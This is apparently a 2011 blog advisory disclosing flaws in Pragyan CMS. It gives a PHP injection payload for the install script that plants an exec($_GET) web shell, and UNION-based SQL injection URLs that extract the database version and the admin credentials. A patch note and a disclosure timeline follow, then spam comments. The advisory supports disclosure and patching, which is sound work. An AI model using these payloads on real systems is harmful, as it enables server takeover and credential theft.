Friday, February 25, 2011

Pragyan CMS Multiple Vulnerabilities

Affected Software
Pragyan CMS

Technical Description
1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibly write at password field string:

");echo exec($_GET["a"]);echo ("

or in another fields with turned of javascript.
in cms/ will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allow command execution.

2) sql injection
- get mysql version
http://host/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--
- get admin account
http://host/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT 0,1),null,null,null--

update to Pragyan CMS 3.0 rev.274

2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclose



  1. I just want to say thanks for your wonderful post, it is contain a lot of knowledge and information that i needed right now. Thanks!
    y8 dress up, y8 cooking, y8 girl

  2. This is one of the cult game now, a lot of people enjoy playing them . Also you can refer to the game :
    animal jam 2 | five nights at freddys 2 | hotmail login